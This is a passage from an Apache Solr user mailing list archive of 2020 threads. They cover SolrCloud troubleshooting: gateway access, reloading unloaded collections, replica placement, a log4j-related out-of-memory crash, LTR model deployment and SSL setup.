eliminate the cert as a cause of my issues)
o backend pool for the two 
sorlCloud VMs
o an HTTP setting for Backend port 
8983

I can access the dashboard for the nodes using:
* 
http://:8983/solr/#/<http://%3cnode-pub-ip%3e:8983/solr/#/>

But not when using either of the following:
* 
https:///solr/#<https://%3capp-gtwy-ip%3e/solr/#> with a public 
listener on port 443
* 
http:///solr/#<http://%3capp-gtwy-ip%3e/solr/#> with a public 
listener on port 80

The private IPs of both SolrCloud VMs are reporting healthy on port 8983 with a 
302-status code according to the default Backend Health monitor on Application 
Gateway.

I greatly appreciate any help provided.

Thanks,

Victor



Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-12 Thread Erick Erickson
As stated in the docs, using the core admin API when using SolrCloud is not 
recommended, 
for just reasons like this. While SolrCloud _does_ use the Core Admin API, it’s 
usage
has to be very precise.

You apparently didn’t heed this warning in the UNLOAD command for the 
collections API:

"Unloading all cores in a SolrCloud collection causes the removal of that 
collection’s metadata from ZooKeeper.”

This latter is what the “non legacy mode…” message is about. In earlier 
versions of Solr,
the ZK information was recreated when Solr found a core.properties file, but 
that had
its own problems so was removed.

Your best bet now is to wipe your directories, create a new collection and 
re-index.

If you absolutely can’t reindex:
0> save away one index directory from every shard, it doesn’t matter which.
1> create the collection, with the exact same number of shards and a 
replicationFactor of 1
2> shut down all the Solr instances
3> copy the index directory from <0> to ’the right place”. For instance, if you
have a collection blah, you’ll have some directory like 
blah_shard1_replica_n1/data/index.
It’s critical that you replace the contents of data/index with the contents 
of the
directory saved in <0> from the _same_ shard, shard1 in this example.
4> start your Solr instances back up
5> use ADDREPLICA to build out the collection to have as many replicas as you 
need.

Good luck!
Erick


> On Nov 12, 2020, at 6:32 AM, Gajanan  wrote:
> 
> I have unloaded all cores of a collection in SolrCloud (8.x.x ) using
> coreAdmin APIs as UNLOAD collection is not available in collections API. Now
> I want reload the unloaded collection using APIs only. 
> When trying with coreAdmin APIs I am getting "Non legacy mode CoreNodeName
> not found." 
> When trying with collections APIs it is reloaded but shows no cores
> available.
> 
> 
> 
> 
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html



How to unload and reload a solr collection in SolrCloud

2020-11-12 Thread Gajanan Watkar
I want to unload and reload all cores of a collection in SolrCloud mode
(Solr 8.x.x).

-- 
-Gajanan


Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-12 Thread Gajanan
I have unloaded all cores of a collection in SolrCloud (8.x.x ) using
coreAdmin APIs as UNLOAD collection is not available in collections API. Now
I want reload the unloaded collection using APIs only. 
When trying with coreAdmin APIs I am getting "Non legacy mode CoreNodeName
not found." 
When trying with collections APIs it is reloaded but shows no cores
available.




--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-11 Thread Amy Bai
Hi Erick,

Thanks for your kindly reply.
There are two things that confuse me:

1. index/search queries keep failing because one of the node data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the Index/search 
queries didn't failover to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy



Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-09 Thread Erick Erickson
Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
> 
> Hi community,
> 
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
> 
> 
> Regards,
> Amy



SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-09 Thread Amy Bai
Hi community,

I found that SolrCloud won't check the IO status if the SolrCloud process is 
alive.
E.g. If I delete the SolrCloud data directory, there are no errors report, and 
I can still log in to the SolrCloud   Admin UI to create/query collections.
Is this reasonable?
Can someone explain why SOLR handles it like this?
Thanks so much.


Regards,
Amy


Re: Solrcloud create collection ignores createNodeSet parameter

2020-10-27 Thread Erick Erickson
You’re confusing replicas and shards a bit. Solr tries its best to put multiple 
replicas _of the same shard_ on different nodes. You have two shards though 
with _one_ replica. Thi is a bit of a nit, but important to keep in mind when 
your replicatinFactor increases. So from an HA perspective, this isn’t 
catastrophic since both shards must be up to run.

That said, it does seem reasonable to use all the nodes in your case. If you 
omit the createNodeSet, what happens? I’m curious if that’s confusing things 
somehow. And can you totally guarantee that both nodes are accessible when the 
collection is created?

BTW, I’ve always disliked the parameter name “maxShardsPerNode”, shards isn’t 
what it’s actually about. But I suppose 
“maxReplicasOfAnyIndividualShardOnASingleNode” is a little verbose...

> On Oct 27, 2020, at 2:17 PM, Webster Homer  
> wrote:
> 
> We have a solrcloud set up with 2 nodes, 1 zookeeper and running Solr 7.7.2 
> This cloud is used for development purposes. Collections are sharded across 
> the 2 nodes.
> 
> Recently we noticed that one of the main collections we use had both replicas 
> running on the same node. Normally we don't see collections created where the 
> replicas run on the same node.
> 
> I tried to create a new version of the collection forcing it to use both 
> nodes. However, that doesn't work both replicas are created on the same node:
> /solr/admin/collections?action=CREATE=sial-catalog-product-20201027=sial-catalog-product-20200808=2=1=1=uc1a-ecomdev-msc02:8983_solr,uc1a-ecomdev-msc01:8983_solr
> The call returns this:
> {
>"responseHeader": {
>"status": 0,
>"QTime": 4659
>},
>"success": {
>"uc1a-ecomdev-msc01:8983_solr": {
>"responseHeader": {
>"status": 0,
>"QTime": 3900
>},
>"core": "sial-catalog-product-20201027_shard2_replica_n2"
>},
>"uc1a-ecomdev-msc01:8983_solr": {
>"responseHeader": {
>"status": 0,
>"QTime": 4012
>},
>"core": "sial-catalog-product-20201027_shard1_replica_n1"
>}
>}
> }
> 
> Both replicas are created on the same node. Why is this happening?
> 
> How do we force the replicas be placed on different nodes?
> 
> 
> 
> This message and any attachment are confidential and may be privileged or 
> otherwise protected from disclosure. If you are not the intended recipient, 
> you must not copy this message or attachment or disclose the contents to any 
> other person. If you have received this transmission in error, please notify 
> the sender immediately and delete the message and any attachment from your 
> system. Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not 
> accept liability for any omissions or errors in this message which may arise 
> as a result of E-Mail-transmission or for damages resulting from any 
> unauthorized changes of the content of this message and any attachment 
> thereto. Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not 
> guarantee that this message is free of viruses and does not accept liability 
> for any damages caused by any virus transmitted therewith.
> 
> 
> 
> Click http://www.merckgroup.com/disclaimer to access the German, French, 
> Spanish and Portuguese versions of this disclaimer.



Solrcloud create collection ignores createNodeSet parameter

2020-10-27 Thread Webster Homer
We have a solrcloud set up with 2 nodes, 1 zookeeper and running Solr 7.7.2 
This cloud is used for development purposes. Collections are sharded across the 
2 nodes.

Recently we noticed that one of the main collections we use had both replicas 
running on the same node. Normally we don't see collections created where the 
replicas run on the same node.

I tried to create a new version of the collection forcing it to use both nodes. 
However, that doesn't work both replicas are created on the same node:
/solr/admin/collections?action=CREATE=sial-catalog-product-20201027=sial-catalog-product-20200808=2=1=1=uc1a-ecomdev-msc02:8983_solr,uc1a-ecomdev-msc01:8983_solr
The call returns this:
{
"responseHeader": {
"status": 0,
"QTime": 4659
},
"success": {
"uc1a-ecomdev-msc01:8983_solr": {
"responseHeader": {
"status": 0,
"QTime": 3900
},
"core": "sial-catalog-product-20201027_shard2_replica_n2"
},
"uc1a-ecomdev-msc01:8983_solr": {
"responseHeader": {
"status": 0,
"QTime": 4012
},
"core": "sial-catalog-product-20201027_shard1_replica_n1"
}
}
}

Both replicas are created on the same node. Why is this happening?

How do we force the replicas be placed on different nodes?



This message and any attachment are confidential and may be privileged or 
otherwise protected from disclosure. If you are not the intended recipient, you 
must not copy this message or attachment or disclose the contents to any other 
person. If you have received this transmission in error, please notify the 
sender immediately and delete the message and any attachment from your system. 
Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not accept 
liability for any omissions or errors in this message which may arise as a 
result of E-Mail-transmission or for damages resulting from any unauthorized 
changes of the content of this message and any attachment thereto. Merck KGaA, 
Darmstadt, Germany and any of its subsidiaries do not guarantee that this 
message is free of viruses and does not accept liability for any damages caused 
by any virus transmitted therewith.



Click http://www.merckgroup.com/disclaimer to access the German, French, 
Spanish and Portuguese versions of this disclaimer.


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-19 Thread Dominique Bejean
Shawn,

According to the log4j description (
https://bz.apache.org/bugzilla/show_bug.cgi?id=57714), the issue is related
to lock during appenders collection process.

In addition to CONSOLE and file appenders in the default log4j.properties,
my customer added 2 extra FileAppender dedicated to all requests and slow
requests. I suggested removing these two extra appenders.

Regards

Dominique



Le lun. 19 oct. 2020 à 15:48, Dominique Bejean 
a écrit :

> Hi Shawn,
>
> Thank you for your response.
>
> You are confirming my diagnosis.
>
> This is in fact a 8 nodes cluster with one single collection with 4 shards
> and 1 replica (8 cores).
>
> 4 Gb heap and 90 Gb Ram
>
>
> When no issue occurs nearly 50% of the heap is used.
>
> Num Docs in collection : 10.000.000
>
> Num Docs per core is more or less 2.500.000
>
> Max Doc per core is more or less 3.000.000
>
> Core Data size is more or less 70 Gb
>
> Here are the JVM settings
>
> -DSTOP.KEY=solrrocks
>
> -DSTOP.PORT=7983
>
> -Dcom.sun.management.jmxremote
>
> -Dcom.sun.management.jmxremote.authenticate=false
>
> -Dcom.sun.management.jmxremote.local.only=false
>
> -Dcom.sun.management.jmxremote.port=18983
>
> -Dcom.sun.management.jmxremote.rmi.port=18983
>
> -Dcom.sun.management.jmxremote.ssl=false
>
> -Dhost=
>
> -Djava.rmi.server.hostname=XXX
>
> -Djetty.home=/x/server
>
> -Djetty.port=8983
>
> -Dlog4j.configuration=file:/xx/log4j.properties
>
> -Dsolr.install.dir=/xx/solr
>
> -Dsolr.jetty.request.header.size=32768
>
> -Dsolr.log.dir=/xxx/Logs
>
> -Dsolr.log.muteconsole
>
> -Dsolr.solr.home=//data
>
> -Duser.timezone=Europe/Paris
>
> -DzkClientTimeout=3
>
> -DzkHost=xxx
>
> -XX:+CMSParallelRemarkEnabled
>
> -XX:+CMSScavengeBeforeRemark
>
> -XX:+ParallelRefProcEnabled
>
> -XX:+PrintGCApplicationStoppedTime
>
> -XX:+PrintGCDateStamps
>
> -XX:+PrintGCDetails
>
> -XX:+PrintGCTimeStamps
>
> -XX:+PrintHeapAtGC
>
> -XX:+PrintTenuringDistribution
>
> -XX:+UseCMSInitiatingOccupancyOnly
>
> -XX:+UseConcMarkSweepGC
>
> -XX:+UseGCLogFileRotation
>
> -XX:+UseGCLogFileRotation
>
> -XX:+UseParNewGC
>
> -XX:-OmitStackTraceInFastThrow
>
> -XX:CMSInitiatingOccupancyFraction=50
>
> -XX:CMSMaxAbortablePrecleanTime=6000
>
> -XX:ConcGCThreads=4
>
> -XX:GCLogFileSize=20M
>
> -XX:MaxTenuringThreshold=8
>
> -XX:NewRatio=3
>
> -XX:NumberOfGCLogFiles=9
>
> -XX:OnOutOfMemoryError=/xxx/solr/bin/oom_solr.sh
>
> 8983
>
> /xx/Logs
>
> -XX:ParallelGCThreads=4
>
> -XX:PretenureSizeThreshold=64m
>
> -XX:SurvivorRatio=4
>
> -XX:TargetSurvivorRatio=90
>
> -Xloggc:/xx/solr_gc.log
>
> -Xloggc:/xx/solr_gc.log
>
> -Xms4g
>
> -Xmx4g
>
> -Xss256k
>
> -verbose:gc
>
>
>
> Here is one screenshot of top command for the node that failed last week.
>
> [image: 2020-10-19 15_48_06-Photos.png]
>
> Regards
>
> Dominique
>
>
>
> Le dim. 18 oct. 2020 à 22:03, Shawn Heisey  a écrit :
>
>> On 10/18/2020 3:22 AM, Dominique Bejean wrote:
>> > A few months ago, I reported an issue with Solr nodes crashing due to
>> the
>> > old generation heap growing suddenly and generating OOM. This problem
>> > occurred again this week. I have threads dumps for each minute during
>> the 3
>> > minutes the problem occured. I am using fastthread.io in order to
>> analyse
>> > these dumps.
>>
>> 
>>
>> > * The Log4j issue starts (
>> > https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)
>>
>> If the log4j bug is the root cause here, then the only way you can fix
>> this is to upgrade to at least Solr 7.4.  That is the Solr version where
>> we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j
>> in Solr 6.6.2 without changing Solr code.  The code changes required
>> were extensive.  Note that I did not do anything to confirm whether the
>> log4j bug is responsible here.  You seem pretty confident that this is
>> the case.
>>
>> Note that if you upgrade to 8.x, you will need to reindex from scratch.
>> Upgrading an existing index is possible with one major version bump, but
>> if your index has ever been touched by a release that's two major
>> versions back, it won't work.  In 8.x, that is enforced -- 8.x will not
>> even try to read an old index touched by 6.x or earlier.
>>
>> In the following wiki page, I provided instructions for getting a
>> screenshot of the process listing.
>>
>> https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems
>>
>> In addition to that screenshot, I would like to know the on-disk size of
>> all the cores running on the problem node, along with a document count
>> from those cores.  It might be possible to work around the OOM just by
>> increasing the size of the heap.  That won't do anything about problems
>> with log4j.
>>
>> Thanks,
>> Shawn
>>
>


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-19 Thread Dominique Bejean
Hi Shawn,

Thank you for your response.

You are confirming my diagnosis.

This is in fact a 8 nodes cluster with one single collection with 4 shards
and 1 replica (8 cores).

4 Gb heap and 90 Gb Ram


When no issue occurs nearly 50% of the heap is used.

Num Docs in collection : 10.000.000

Num Docs per core is more or less 2.500.000

Max Doc per core is more or less 3.000.000

Core Data size is more or less 70 Gb

Here are the JVM settings

-DSTOP.KEY=solrrocks

-DSTOP.PORT=7983

-Dcom.sun.management.jmxremote

-Dcom.sun.management.jmxremote.authenticate=false

-Dcom.sun.management.jmxremote.local.only=false

-Dcom.sun.management.jmxremote.port=18983

-Dcom.sun.management.jmxremote.rmi.port=18983

-Dcom.sun.management.jmxremote.ssl=false

-Dhost=

-Djava.rmi.server.hostname=XXX

-Djetty.home=/x/server

-Djetty.port=8983

-Dlog4j.configuration=file:/xx/log4j.properties

-Dsolr.install.dir=/xx/solr

-Dsolr.jetty.request.header.size=32768

-Dsolr.log.dir=/xxx/Logs

-Dsolr.log.muteconsole

-Dsolr.solr.home=//data

-Duser.timezone=Europe/Paris

-DzkClientTimeout=3

-DzkHost=xxx

-XX:+CMSParallelRemarkEnabled

-XX:+CMSScavengeBeforeRemark

-XX:+ParallelRefProcEnabled

-XX:+PrintGCApplicationStoppedTime

-XX:+PrintGCDateStamps

-XX:+PrintGCDetails

-XX:+PrintGCTimeStamps

-XX:+PrintHeapAtGC

-XX:+PrintTenuringDistribution

-XX:+UseCMSInitiatingOccupancyOnly

-XX:+UseConcMarkSweepGC

-XX:+UseGCLogFileRotation

-XX:+UseGCLogFileRotation

-XX:+UseParNewGC

-XX:-OmitStackTraceInFastThrow

-XX:CMSInitiatingOccupancyFraction=50

-XX:CMSMaxAbortablePrecleanTime=6000

-XX:ConcGCThreads=4

-XX:GCLogFileSize=20M

-XX:MaxTenuringThreshold=8

-XX:NewRatio=3

-XX:NumberOfGCLogFiles=9

-XX:OnOutOfMemoryError=/xxx/solr/bin/oom_solr.sh

8983

/xx/Logs

-XX:ParallelGCThreads=4

-XX:PretenureSizeThreshold=64m

-XX:SurvivorRatio=4

-XX:TargetSurvivorRatio=90

-Xloggc:/xx/solr_gc.log

-Xloggc:/xx/solr_gc.log

-Xms4g

-Xmx4g

-Xss256k

-verbose:gc



Here is one screenshot of top command for the node that failed last week.

[image: 2020-10-19 15_48_06-Photos.png]

Regards

Dominique



Le dim. 18 oct. 2020 à 22:03, Shawn Heisey  a écrit :

> On 10/18/2020 3:22 AM, Dominique Bejean wrote:
> > A few months ago, I reported an issue with Solr nodes crashing due to the
> > old generation heap growing suddenly and generating OOM. This problem
> > occurred again this week. I have threads dumps for each minute during
> the 3
> > minutes the problem occured. I am using fastthread.io in order to
> analyse
> > these dumps.
>
> 
>
> > * The Log4j issue starts (
> > https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)
>
> If the log4j bug is the root cause here, then the only way you can fix
> this is to upgrade to at least Solr 7.4.  That is the Solr version where
> we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j
> in Solr 6.6.2 without changing Solr code.  The code changes required
> were extensive.  Note that I did not do anything to confirm whether the
> log4j bug is responsible here.  You seem pretty confident that this is
> the case.
>
> Note that if you upgrade to 8.x, you will need to reindex from scratch.
> Upgrading an existing index is possible with one major version bump, but
> if your index has ever been touched by a release that's two major
> versions back, it won't work.  In 8.x, that is enforced -- 8.x will not
> even try to read an old index touched by 6.x or earlier.
>
> In the following wiki page, I provided instructions for getting a
> screenshot of the process listing.
>
> https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems
>
> In addition to that screenshot, I would like to know the on-disk size of
> all the cores running on the problem node, along with a document count
> from those cores.  It might be possible to work around the OOM just by
> increasing the size of the heap.  That won't do anything about problems
> with log4j.
>
> Thanks,
> Shawn
>


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-18 Thread Shawn Heisey

On 10/18/2020 3:22 AM, Dominique Bejean wrote:

A few months ago, I reported an issue with Solr nodes crashing due to the
old generation heap growing suddenly and generating OOM. This problem
occurred again this week. I have threads dumps for each minute during the 3
minutes the problem occured. I am using fastthread.io in order to analyse
these dumps.





* The Log4j issue starts (
https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)


If the log4j bug is the root cause here, then the only way you can fix 
this is to upgrade to at least Solr 7.4.  That is the Solr version where 
we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j 
in Solr 6.6.2 without changing Solr code.  The code changes required 
were extensive.  Note that I did not do anything to confirm whether the 
log4j bug is responsible here.  You seem pretty confident that this is 
the case.


Note that if you upgrade to 8.x, you will need to reindex from scratch. 
Upgrading an existing index is possible with one major version bump, but 
if your index has ever been touched by a release that's two major 
versions back, it won't work.  In 8.x, that is enforced -- 8.x will not 
even try to read an old index touched by 6.x or earlier.


In the following wiki page, I provided instructions for getting a 
screenshot of the process listing.


https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems

In addition to that screenshot, I would like to know the on-disk size of 
all the cores running on the problem node, along with a document count 
from those cores.  It might be possible to work around the OOM just by 
increasing the size of the heap.  That won't do anything about problems 
with log4j.


Thanks,
Shawn


SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-18 Thread Dominique Bejean
Hi,

A few months ago, I reported an issue with Solr nodes crashing due to the
old generation heap growing suddenly and generating OOM. This problem
occurred again this week. I have threads dumps for each minute during the 3
minutes the problem occured. I am using fastthread.io in order to analyse
these dumps.

The threads scenario on failing node is

=== 15h54 -> it looks fine
Old gen heap : 0,5 Gb (3Gb max)
67 threads TIMED_WAITING
26 threads RUNNABLE
7 threads WAITING

=== 15h55 -> fastthreads reports few suspects
Old gen heap stars growing : from 0,5 Gb to 2 Gb (3Gb max)
42 threads TIMED_WAITING
41 threads RUNNABLE
10 threads WAITING

The first symptom is 8 runnable threads are stuck  (same stack trace)
waiting for response from some other nodes

java.lang.Thread.State: RUNNABLE
at java.net.SocketInputStream.socketRead0(Native Method)
at java.net.SocketInputStream.socketRead(SocketInputStream.java:116)
at java.net.SocketInputStream.read(SocketInputStream.java:170)
at java.net.SocketInputStream.read(SocketInputStream.java:141)
at
org.apache.http.impl.io.AbstractSessionInputBuffer.fillBuffer(AbstractSessionInputBuffer.java:160)
at
org.apache.http.impl.io.SocketInputBuffer.fillBuffer(SocketInputBuffer.java:84)
at
org.apache.http.impl.io.SocketInputBuffer.isDataAvailable(SocketInputBuffer.java:95)
at
org.apache.http.impl.AbstractHttpClientConnection.isStale(AbstractHttpClientConnection.java:310)
at
org.apache.http.impl.conn.ManagedClientConnectionImpl.isStale(ManagedClientConnectionImpl.java:158)
at
org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:433)
at
org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:882)
at
org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
at
org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:55)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:515)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:279)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:268)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:447)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:388)
at
org.apache.solr.handler.component.HttpShardHandlerFactory.makeLoadBalancedRequest(HttpShardHandlerFactory.java:302)
at
org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:166)
at
org.apache.solr.handler.component.HttpShardHandler$$Lambda$192/1788637481.call(Unknown
Source)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at
com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor$$Lambda$15/986729174.run(Unknown
Source)
at
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)


=== 15h56 -> fastthreads reports issue
Old gen heap full : from 3Gb (3Gb max)
57 threads TIMED_WAITING
126 threads RUNNABLE
18 threads WAITING
14 threads BLOCKED

7 runnable threads are still stuck  (same stack trace) waiting for response
from some other nodes

1  BLOCKED thread obtained org.apache.log4j.Logger's lock & did not release
it due to that 13 threads are BLOCKED (same stack trace) on
org.apache.log4j.Category.callAppenders

java.lang.Thread.State: BLOCKED (on object monitor)
at org.apache.log4j.Category.callAppenders(Category.java:204)
- waiting to lock <0x0007005a6f08> (a org.apache.log4j.Logger)
at org.apache.log4j.Category.forcedLog(Category.java:391)
at org.apache.log4j.Category.log(Category.java:856)
at org.slf4j.impl.Log4jLoggerAdapter.info(Log4jLoggerAdapter.java:304)
at org.apache.solr.core.SolrCore.execute(SolrCore.java:2482)
at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:723)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:529)
at
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:361)
at
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:305)
at
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1691)
at
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:582)
at
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:548)
at
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:226)
at

Add Hosts in SolrCloud

2020-09-28 Thread Massimiliano Randazzo
Hello everybody

I have a SolrCloud consisting of 4 Servers, I have a collection with 2
shars in replica 2

Collection: bookReaderAttilioHortis
Shard count: 2
configName: BookReader
replicationFactor: 2
maxShardsPerNode: 2
router: compositeId
autoAddReplicas: false

I would like to add 2 more servers bringing shards to 3 while keeping 2
replication to increase storage space and performance

Thank you in advance for your help

Thank you
Massimiliano Randazzo

-- 
Massimiliano Randazzo

Analista Programmatore,
Sistemista Senior
Mobile +39 335 6488039
email: massimiliano.randa...@gmail.com
pec: massimiliano.randa...@pec.net


Re: Issues deploying LTR into SolrCloud

2020-09-21 Thread krishan goyal
Not sure how solr cloud works but if your still facing issues, can try this

1. Deploy the features and models as a _schema_feature-store.json
and _schema_model-store.json file in the right config set.
2. Can either deploy to all nodes (works for me) or add these files
to confFiles in /replication request handler.


On Wed, Aug 26, 2020 at 1:00 PM Dmitry Kan  wrote:

> Hello,
>
> Just noticed my numbering is off, should be:
>
> 1. Deploy a feature store from a JSON file to each collection.
> 2. Reload all collections as advised in the documentation:
>
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> 3. Deploy the related model from a JSON file.
> 4. Reload all collections again.
>
>
> An update: applying this process twice I was able to fix the issue.
> However, it required "patching" individual collections, while reloading was
> done for all collections at once. I'm not sure this is very transparent to
> the user: maybe show the model deployment status per collection in the
> admin UI?
>
> Thanks,
>
> Dmitry
>
> On Tue, Aug 25, 2020 at 6:20 PM Dmitry Kan  wrote:
>
> > Hi,
> >
> > There is a recent thread "Replication of Solr Model and feature store" on
> > deploying LTR feature store and model into a master/slave Solr topology.
> >
> > I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
> > collections have shards with replicas. This is the process I've been
> > following:
> >
> > 1. Deploy a feature store from a JSON file to each collection.
> > 2. Reload all collections as advised in the documentation:
> >
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> > 3. Deploy the related model from a JSON file.
> > 3. Reload all collections again.
> >
> >
> > The problem is that even after reloading the collections, shard replicas
> > continue to not have the model:
> >
> > Error from server at
> > http://server1:8983/solr/collection1_shard1_replica_n1: cannot find
> model
> > 'model_name'
> >
> > What is the proper way to address this issue and can it be potentially a
> > bug in SolrCloud?
> >
> > Is there any workaround I can try, like saving the feature store and
> model
> > JSON files into the collection config path and creating the SolrCloud
> from
> > there?
> >
> > Thanks,
> >
> > Dmitry
> >
> > --
> > Dmitry Kan
> > Luke Toolbox: http://github.com/DmitryKey/luke
> > Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
> > Twitter: http://twitter.com/dmitrykan
> > SemanticAnalyzer: https://semanticanalyzer.info
> >
> >
>


RE: SolrCloud (6.6.6) SSL Setup - Unable to create collection

2020-09-04 Thread Victor Kretzer
I solved my problem by using just the certificate from my first node and 
copying that to the second node. I'm not sure whether all three are necessary, 
but I copied: 
*   solr-ssl.keystore.jks
*   solr-ssl-keystore.p12
*   solr-ssl.pem.
If you originally made separate certificates for each node, make sure that on 
the additional nodes you remove those cert files before adding the files from 
the first node. I moved mine to a backup folder I created because I wasn't sure 
what I was trying would work but I think that was unnecessary.

Victor 

-Original Message-
From: Victor Kretzer  
Sent: Thursday, September 3, 2020 3:03 PM
To: solr-user@lucene.apache.org
Subject: SolrCloud (6.6.6) SSL Setup - Unable to create collection

BACKGROUND: I'm attempting to setup SolrCloud (Solr 6.6.6) with an external 
zookeeper ensemble on Azure. I have three dedicated vms for the zookeeper 
ensemble and two for solr all running Ubuntu 18.04 LTS. I'm new to Solr (and 
Linux) and have been heavily relying on the Solr Ref Guide 6.6, most recently 
the following section on enabling ssl:



https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Flucene.apache.org%2Fsolr%2Fguide%2F6_6%2Fenabling-ssl.htmldata=02%7C01%7CVictorKretzer%40gdcit.com%7Ca124b9385d4a4eab744408d8503c0457%7C87b66f08478c40adbb095e93796da295%7C1%7C0%7C637347565991726245sdata=BE%2BPvrXsVzAR67Aoe3D%2FxMruuRlY2Img4aBHeuKpJY8%3Dreserved=0



So far I have:

Installed and setup zookeeper

Installed Solr (using install_solr_service.sh script) on both vms.

Followed the steps under Basic SSL Setup, generating certificates on each of 
the nodes.

Set the cluster-wide property to https per the Configure Zookeeper section of 
SolrCloud in the document

Started both nodes and have been able to navigate to them in my browser with 
https



If I do bin/solr status I get:



Solr process 13106 running on port 8983

{

  "solr_home":"/opt/solr-6.6.6/cloud/test2",

  "version":"6.6.6 68fa249034ba8b273955f20097700dc2fbb7a800 - ishan - 
2019-03-29 09:13:13",

  "startTime":"2020-09-03T18:15:34.092Z",

  "uptime":"0 days, 0 hours, 43 minutes, 29 seconds",

  "memory":"52.7 MB (%10.7) of 490.7 MB",

  "cloud":{

"ZooKeeper":"zk1:2181,zk2:2181,zk3:2181/solr",

"liveNodes":"2",

"collections":"0"}}







THE ISSUE

When I try to create a collection using the steps outlined in the above 
document, I get the following error:



azureuser@solr-node-01-test:/opt/solr$ sudo bin/solr create -c mycollection 
-shards 2 -force



Connecting to ZooKeeper at zk1:2181,zk2:2181,zk3:2181/solr ...

